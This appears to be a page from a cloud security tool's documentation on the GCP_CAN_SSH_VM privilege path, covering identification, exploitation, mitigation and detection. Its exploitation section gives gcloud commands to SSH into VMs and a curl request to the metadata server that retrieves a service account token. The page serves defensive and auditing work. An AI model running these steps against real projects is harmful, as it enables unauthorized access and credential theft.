GCP_CAN_SSH_VM

Summary

FSProtect ACL Alias

GCP_CAN_SSH_VM

GCP Alias

Compute Execution & Pipeline Pivots

Affected Object Types

Projects

Exploitation Certainty

Likely

Granting Roles

roles/compute.osLogin, roles/compute.osAdminLogin

Description

GCP_CAN_SSH_VM indicates that an identity holds OS Login permissions (roles/compute.osLogin or roles/compute.osAdminLogin) which allow logging into existing GCE VMs via OS Login. OS Login ties SSH access to IAM identity, replacing traditional SSH key management. An attacker with this permission can log into any VM in the project (or org, if the role is scoped at that level) and interact with the OS.

Identification

gcloud CLI

PROJECT_ID="my-project"
# List VMs and their SA attachments
gcloud compute instances list --project=$PROJECT_ID \
  --format="table(name, zone, status, serviceAccounts[0].email, metadata.items[enable-oslogin])"

# Find who has OS Login permissions
gcloud projects get-iam-policy $PROJECT_ID --format=json | \
  jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}'

# Check if OS Login is enabled on the project
gcloud compute project-info describe --project=$PROJECT_ID \
  --format="value(commonInstanceMetadata.items)" | grep enable-oslogin

# Check instance-level OS Login setting (can override project default)
gcloud compute instances describe VM_NAME --zone=ZONE --project=$PROJECT_ID \
  --format="value(metadata.items)"

GCP Console

Open GCP Console → Compute Engine → VM Instances.
Click on a VM → SSH button — if enabled, IAM principals with OS Login roles can access it.
Check IAM & Admin → IAM for Compute OS Login or Compute OS Admin Login roles.

Exploitation

gcloud CLI

# Identify VMs running high-privilege service accounts
gcloud compute instances list --project=$PROJECT_ID \
  --format="table(name, zone, status, serviceAccounts[0].email)"

# Confirm OS Login is enabled
gcloud compute project-info describe --project=$PROJECT_ID \
  --format="value(commonInstanceMetadata.items)" | grep enable-oslogin

# Check for OS Login roles in project
gcloud projects get-iam-policy $PROJECT_ID --format=json | \
  jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}'

# SSH into the target VM
gcloud compute ssh VM_NAME --zone=us-central1-a --project=$PROJECT_ID

# Query the metadata server for the SA token from inside the VM
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

Mitigation

Scope OS Login roles narrowly — assign at specific VM resource level rather than project-wide where possible.
Use roles/compute.osLogin (non-sudo) instead of roles/compute.osAdminLogin unless root access is needed.
Attach minimal-privilege SAs to VMs — VMs that don't need elevated GCP API access should use a dedicated low-privilege SA.
Block metadata server access from VMs that don't need it using custom metadata or network controls.

Detection

Log Type

Method

Key Fields

Data Access

compute.instances.get via OS Login

SSH connection attempts

System Event

OS Login SSH auth

resource.type=gce_instance

# Monitor OS Login authentication events
gcloud logging read \
  'resource.type="gce_instance" AND protoPayload.methodName=~"oslogin"' \
  --project=$PROJECT_ID \
  --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, resource.labels.instance_id)"

Alert on:

OS Login SSH connections to VMs running high-privilege SAs.
SSH connections from unexpected geographic locations or IP ranges.
Metadata server token requests shortly after an OS Login session begins.

References

https://cloud.google.com/compute/docs/oslogin/set-up-oslogin
https://cloud.google.com/compute/docs/metadata/overview

PreviousGCP_CAN_SET_SA_IAMPOLICY NextGCP_CAN_TRIGGER_BUILD

Last updated 6 days ago

Was this helpful?